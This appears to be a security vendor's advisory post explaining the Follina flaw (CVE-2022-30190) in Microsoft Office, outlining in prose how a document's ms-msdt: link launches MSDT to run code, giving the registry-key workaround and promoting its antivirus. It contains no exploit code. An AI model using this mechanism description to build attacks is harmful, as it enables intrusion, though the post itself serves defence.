The internet is abuzz with news of a zero-day remote code execution bug in Microsoft Office
Microsoft now calls it CVE-2022-30190
How does it work then?
The exploit works like this
- You open a booby trapped DOC file
- The document references a regular-looking https: URL, which downloads onto your system
- The referenced HTML file contains “interesting looking” JavaScript code
- The JavaScript opens another URL with an unusual identifier ms-msdt: instead of the regular
- ms-msdt: is actually a proprietary Microsoft URL type, it launches the MSDT (Microsoft Support Diagnostic Tool) software toolkit
- The MSDT is an actual Microsoft tool, usually used for troubleshooting. its job is to run remote code on your system
- Unfortunately, almost any untrusted code can then be run, bypassing any other security features inbuilt into Windows
- This is triggered by Word referencing the rogue ms-msst: URL which is in the document itself
- What if you have disabled macros (which is now default in Word). Well, its NOT a macro, so again, usual security protocols inbuilt into the software is completely bypassed
So, what can I do?
Microsoft’s workaround is to break the relationship between ms-msdt and MSDT.EXE
You can simply remove the registry key HKEY_CLASSES_ROOT\ms-msdt if it exists
Microsoft’s official response, and workaround, is here, https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
Our premium Anti-Virus solution will protect you from this attack, even though it is a zero-day exploit, or that it isn’t a Macro
Mucking around with the registry on any Windows system can be – dangerous
if you would like help, or to discuss our premium security solutions, Contact us now for assistance